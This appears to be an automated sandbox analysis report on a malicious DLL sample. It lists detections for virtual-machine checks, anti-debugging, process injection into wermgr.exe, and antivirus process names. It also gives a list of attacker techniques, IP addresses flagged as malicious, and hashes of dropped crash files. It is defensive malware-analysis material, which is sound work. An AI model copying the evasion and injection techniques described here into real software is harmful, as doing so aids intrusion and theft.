            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5392 Thread sleep count: 181 > 30
            Source: C:\Windows\SysWOW64\wermgr.exe TID: 6848 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_17-13010
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 rdtsc 3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_17-11954
            Source: C:\Windows\SysWOW64\wermgr.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0494B883 GetSystemInfo, 17_2_0494B883
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_04949DA8 FindFirstFileW,FindNextFileW, 17_2_04949DA8
            Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
            Source: Amcache.hve.8.dr Binary or memory string: VMware
            Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
            Source: Amcache.hve.8.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
            Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
            Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.8.dr Binary or memory string: VMware7,1
            Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.me
            Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.8.dr Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
            Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
            Source: Amcache.hve.8.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1g

            Anti Debugging

            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 Start: 10035315 End: 1003515E 3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress, 3_2_1001F523
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 rdtsc 3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001E0D9 mov eax, dword ptr fs:[00000030h] 3_2_1001E0D9
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_3_046B2297 mov eax, dword ptr fs:[00000030h] 17_3_046B2297
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_04941015 mov eax, dword ptr fs:[00000030h] 17_2_04941015
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_049421CD mov eax, dword ptr fs:[00000030h] 17_2_049421CD
            Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 760000
            Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 730000
            Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1093C50
            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 730000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 760000 protect: page read and write
            Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 730000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0494C2D1 GetSystemTimeAsFileTime, 17_2_0494C2D1
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10092180 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress, 3_2_10092180
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0494BB4D GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW, 17_2_0494BB4D
            Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
            Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
            Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
            Source: Amcache.hve.8.dr Binary or memory string: msmpeng.exe
            Source: Amcache.hve.8.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
            Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
            Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match File source: 17.2.rundll32.exe.4940000.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 17.2.rundll32.exe.2c51168.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 17.2.rundll32.exe.2c51168.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match File source: 17.2.rundll32.exe.4940000.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 17.2.rundll32.exe.2c51168.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 17.2.rundll32.exe.2c51168.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 3 Native API; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Rundll32; 1 DLL Side-Loading; Steganography; Compile After Delivery
            Credential Access: 1 Credential API Hooking; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 2 System Time Discovery; 31 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 14 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Credential API Hooking; 1 Input Capture; 1 Archive Collected Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Command and Control: 21 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Multiband Communication; Commonly Used Port
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
            Behavior Graph (figure not preserved). ID: 878698, Sample: F072.dll, Startdate: 31/05/2023, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            F072.dll | 3% | ReversingLabs | Win32.Malware.Generic |
            F072.dll | 6% | Virustotal | | Browse
            F072.dll | 100% | Avira | HEUR/AGEN.1363694 |
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            xfinity.com | 68.87.41.40 | true | false | | high
            www.xfinity.com | unknown | unknown | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            https://xfinity.com/ | false | | high

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://www.xfinity.com/mobile/policies/broadband-disclosures | national[1].htm.24.dr | false | | high
            http://upx.sf.net | Amcache.hve.8.dr | false | | high
            https://www.xfinity.com/learn/internet-service/acp | national[1].htm.24.dr | false | | high
            https://www.xfinity.com/networkmanagement | national[1].htm.24.dr | false | | high
            https://streams.videolan.org/upload/ | rundll32.exe, rundll32.exe, 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.399211143.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.407006224.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.414998004.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.414998450.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.419061010.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F072.dll | false | | high
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            unknownUnited States
                            5650FRONTIER-FRTRUStrue
                            82.125.44.236
                            unknownFrance
                            3215FranceTelecom-OrangeFRtrue
                            81.229.117.95
                            unknownSweden
                            3301TELIANET-SWEDENTeliaCompanySEtrue
                            89.129.109.27
                            unknownSpain
                            12479UNI2-ASEStrue
                            122.186.210.254
                            unknownIndia
                            9498BBIL-APBHARTIAirtelLtdINtrue
                            79.77.142.22
                            unknownUnited Kingdom
                            9105TISCALI-UKTalkTalkCommunicationsLimitedGBtrue
                            90.78.147.141
                            unknownFrance
                            3215FranceTelecom-OrangeFRtrue
                            122.184.143.86
                            unknownIndia
                            9498BBIL-APBHARTIAirtelLtdINtrue
                            186.75.95.6
                            unknownPanama
                            11556CableWirelessPanamaPAtrue
                            50.68.186.195
                            unknownCanada
                            6327SHAWCAtrue
                            12.172.173.82
                            unknownUnited States
                            2386INS-ASUStrue
                            213.64.33.61
                            unknownSweden
                            3301TELIANET-SWEDENTeliaCompanySEtrue
                            79.168.224.165
                            unknownPortugal
                            2860NOS_COMUNICACOESPTtrue
                            86.97.55.89
                            unknownUnited Arab Emirates
                            5384EMIRATES-INTERNETEmiratesInternetAEtrue
                            176.142.207.63
                            unknownFrance
                            5410BOUYGTEL-ISPFRtrue
                            92.154.17.149
                            unknownFrance
                            3215FranceTelecom-OrangeFRtrue
                            174.58.146.57
                            unknownUnited States
                            7922COMCAST-7922UStrue
                            78.160.146.127
                            unknownTurkey
                            9121TTNETTRtrue
                            58.186.75.42
                            unknownViet Nam
                            18403FPT-AS-APTheCorporationforFinancingPromotingTechnolotrue
                            223.166.13.95
                            unknownChina
                            17621CNCGROUP-SHChinaUnicomShanghainetworkCNtrue
                            65.95.141.84
                            unknownCanada
                            577BACOMCAtrue
                            50.68.204.71
                            unknownCanada
                            6327SHAWCAtrue
                            71.38.155.217
                            unknownUnited States
                            209CENTURYLINK-US-LEGACY-QWESTUStrue
                            104.35.24.154
                            unknownUnited States
                            20001TWC-20001-PACWESTUStrue
                            220.240.164.182
                            unknownAustralia
                            7545TPG-INTERNET-APTPGTelecomLimitedAUtrue
                            103.123.223.133
                            unknownIndia
                            138329KWS-AS-APKenstarWebSolutionsPrivateLimitedINtrue
                            24.198.114.130
                            unknownUnited States
                            11351TWC-11351-NORTHEASTUStrue
                            2.36.64.159
                            unknownItaly
                            30722VODAFONE-IT-ASNITtrue
                            198.2.51.242
                            unknownUnited States
                            20001TWC-20001-PACWESTUStrue
                            92.9.45.20
                            unknownUnited Kingdom
                            13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                            113.11.92.30
                            unknownBangladesh
                            7565BDCOM-BDRangsNiluSquare5thFloorHouse75Road5ADtrue
                            69.119.123.159
                            unknownUnited States
                            6128CABLE-NET-1UStrue
                            69.123.4.221
                            unknownUnited States
                            6128CABLE-NET-1UStrue
                            172.115.17.50
                            unknownUnited States
                            20001TWC-20001-PACWESTUStrue
                            IP
                            192.168.2.1
                            Joe Sandbox Version:37.1.0 Beryl
                            Analysis ID:878698
                            Start date and time:2023-05-31 01:58:09 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 14m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:F072.dll
                            Detection:MAL
                            Classification:mal100.troj.evad.winDLL@31/23@2/100
                            EGA Information:
                            • Successful, ratio: 50%
                            HDC Information:
                            • Successful, ratio: 15.1% (good quality ratio 13.2%)
                            • Quality average: 68.1%
                            • Quality standard deviation: 33.7%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 31
                            • Number of non-executed functions: 134
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.42.254, 13.89.179.12, 20.189.173.20, 52.168.117.173, 104.77.34.176
                            • Excluded domains from analysis (whitelisted): l-9999.l-msedge.net, onedsblobprdeus16.eastus.cloudapp.azure.com, e10994.dscx.akamaiedge.net, l-ring.msedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, www.xfinity.com.edgekey.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, l-ring.l-9999.l-msedge.net
                            • Execution Graph export aborted for target rundll32.exe, PID 5240 because there are no executed functions
                            • Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            Time      Type             Description
                            01:59:11  API Interceptor  5x Sleep call for process: WerFault.exe modified
                            01:59:16  API Interceptor  1x Sleep call for process: loaddll32.exe modified
                            01:59:26  API Interceptor  9x Sleep call for process: wermgr.exe modified
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9052702089985385
                                                                    Encrypted:false
                                                                    SSDEEP:192:MSi30oXJHBUZMX4jed+J/u7skS274ItWc:9iJX5BUZMX4jeU/u7skX4ItWc
                                                                    MD5:2795598C49036A48A74A19DF9F6F4B71
                                                                    SHA1:3476B54B18D415205AA7BFBC159B0C3859EF2287
                                                                    SHA-256:B2F1023844ABF911348CBE9D7CA50C7105EE90FFB8E4C8B5446390AE79775D36
                                                                    SHA-512:75BF83C487C031A3BC45C048AE4B4654F9322C144F01B698367F0184E2BAFD0B5BCAE1164195D1E396F8992020CC650CD831614D7B684823DE01B89AE4A9D236
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9054146093167813
                                                                    Encrypted:false
                                                                    SSDEEP:192:phwi70oXzHBUZMX4jed+J/u7skS274ItWc:4ilXzBUZMX4jeU/u7skX4ItWc
                                                                    MD5:49188D2789A941249B4CB63AC1E845B9
                                                                    SHA1:B63F793517964C5978508E37FD63CA0C4FA898C0
                                                                    SHA-256:7C4D2E80D66AA2D87CA05C6ABC06E4D64448BFD2F54F46F22AA793D1DDD8B9D5
                                                                    SHA-512:A56EA3CA2747333C5FB697D861EC2852C4B50EE3D4BC687215E952434EF6B9AFBE07B43EDD0551A6D7313134B4865482EDF45432167856B88FF1983D06899460
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9051018267592895
                                                                    Encrypted:false
                                                                    SSDEEP:192:O83iC0oXfHBUZMX4jed+J/u7skS274ItWcE:niEXfBUZMX4jeU/u7skX4ItWc
                                                                    MD5:72783B5C2E9149B526FE3FE551816AEB
                                                                    SHA1:E84E7D8BEC02CA368DC4153DE96FE0C6B90C2C36
                                                                    SHA-256:76ABC4AEC718FFBCF5FFDD10C431EAC6C9D360FD9744615EC50DC38C94D21DD9
                                                                    SHA-512:FC217BAC4324283728AFF5CDBE2FA5D49CABA9019C047DE0C17F714AB881D9AC980B751B2A5328CEB48F5D88675BD7B9174D8A8F88939DF0C5841B8094B5E57A
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9052431102174711
                                                                    Encrypted:false
                                                                    SSDEEP:192:8DQiv0oX4HBUZMX4jed+J/u7skS274ItWc:QQiRXgBUZMX4jeU/u7skX4ItWc
                                                                    MD5:D21AA729B823707F84DBC63F024D2A76
                                                                    SHA1:78896E9581FE6821301CAF57746428D8A309276B
                                                                    SHA-256:1AC472C773F6AE8640794706AFBC628933EC7A0C526B8D4E9E145CFF58AA4484
                                                                    SHA-512:9BC99C73D5732ED4DCAA4BA7557B71127125D7D45467290DF08EDB09B346DFC652078E04FC46A2E5642FC8857C58340C8C9498D59EFCC2A0F080D5501A99AB21
                                                                    Malicious:false
                                                                    Preview:Version=1..EventType=APPCRASH..EventTime=133299971488646844..ReportType=2..Consent=1..UploadTime=133299971500053139..ReportStatus=524384..ReportIdentifier=fcc27c4a-9dde-473a-b39e-75ef67017baf..IntegratorReportIdentifier=fa55f076-c9eb-4469-9212-e117db266fdd..Wow64Host=34404..Wow64Guest=332..NsAppName=rundll32.exe..OriginalFilename=RUNDLL32.EXE..AppSessionGuid=00001474-0001-0019-385c-57289e93d901..TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000bcc5dc3222034d3f257f1fd35889e5be90f09
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9047557163759011
                                                                    Encrypted:false
                                                                    SSDEEP:192:igpQEiy0oXOHBUZMX4jed+J/u7skS274ItWc:+EiUXGBUZMX4jeU/u7skX4ItWc
                                                                    MD5:A890360959956FA91ACD65B7D8B109FF
                                                                    SHA1:BAFD4F337A275D13E113B7F8C340FF7E939875E5
                                                                    SHA-256:F50CEE7D17BB46C96F76DD66B7A674F2D2B77C83628774EABDD29836233015FD
                                                                    SHA-512:4B9549DD8BEA95B1EA63B8236205AF4C79595342530C6678FABD876D65F1666FB88BB21618C73BE0D7302CF59FA89B5AB663D9C13736FF4F6810190420ED8FF8
                                                                    Malicious:false
                                                                    Preview:Version=1..EventType=APPCRASH..EventTime=133299971487834311..ReportType=2..Consent=1..UploadTime=133299971500334294..ReportStatus=524384..ReportIdentifier=f7f8d1c2-561c-4eb3-80ae-1dd5dd6922b4..IntegratorReportIdentifier=7bb6a1c4-c76f-4d88-9007-c17c7a51039d..Wow64Host=34404..Wow64Guest=332..NsAppName=rundll32.exe..OriginalFilename=RUNDLL32.EXE..AppSessionGuid=00001478-0001-0019-8da5-53289e93d901..TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000bcc5dc3222034d3f257f1fd35889e5be90f09
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:09 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):44130
                                                                    Entropy (8bit):2.1129885510184807
                                                                    Encrypted:false
                                                                    SSDEEP:192:HbbLGYJO5SkbzTHvlTNj7kq6tLCONWg+p75x3gKp:m5LbzbX7kq6tugBiPp
                                                                    MD5:25DBEE74A690E169C438B8C53E54B64B
                                                                    SHA1:D2DB3ED2AED13D260452E318C8341226F1BDE9D2
                                                                    SHA-256:D4E4782FA9E93D76D8D765AE3D6AD65F865997002A3EAF241326CADEAE4CBC11
                                                                    SHA-512:6E49B5B5B0BC9A55E0F7FFC5EAC84F161D7C919EF0395F2F4B86556F91A52F6A96571FE5CCA622C0D4292E804A448AA748D6CE3CF8BC840307242C5B619ADA96
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:09 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):36730
                                                                    Entropy (8bit):2.289821263424622
                                                                    Encrypted:false
                                                                    SSDEEP:192:HA3ZcCZLCQHNU05O5SkbbxvDUlYaSXInl9qqKny7e/nBP:gJzna5LbbylJIIl9qqKy7OBP
                                                                    MD5:3F788523D54D69153E49F78C5DC1FFBC
                                                                    SHA1:70111FB41B318C2545143429F946EB91D3B439C2
                                                                    SHA-256:21EA9344D447BCED9CB898CCA5031A43861DE7ABC6B0ADBB93AD64E782EF1BB9
                                                                    SHA-512:34B10D476A18062CC6B581F47ACADA01AA02A137BA255B5AEA5571F8AB048BC0C508B1DC34CD5DFE43EA5A6C2D1DA762620F0A50E245C2F7CC49A367E2FD471E
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8246
                                                                    Entropy (8bit):3.6906597990132988
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiOs6m6Yke6hgmfTzSKCprd89bLDsfW5m:RrlsNi16m6Yd6hgmfTzS4LofZ
                                                                    MD5:2D56FDC5A1187B14F8D847999495BAF9
                                                                    SHA1:BDBB9B892C585E9CCF6105BBA25F4591DEFA8711
                                                                    SHA-256:104AE929922673AE6473DA7ACD0085160B1F398697EDAABAE0B2D3187DF86579
                                                                    SHA-512:A1CB1EFA91E5680B0162A3C03E76245C6FA1DDA6C4666E24F76BC0DF9506668C543E471B9EE4DA1855A8E2651C9BBE499E472EFD805C0205EBE1A06954135316
                                                                    Malicious:false
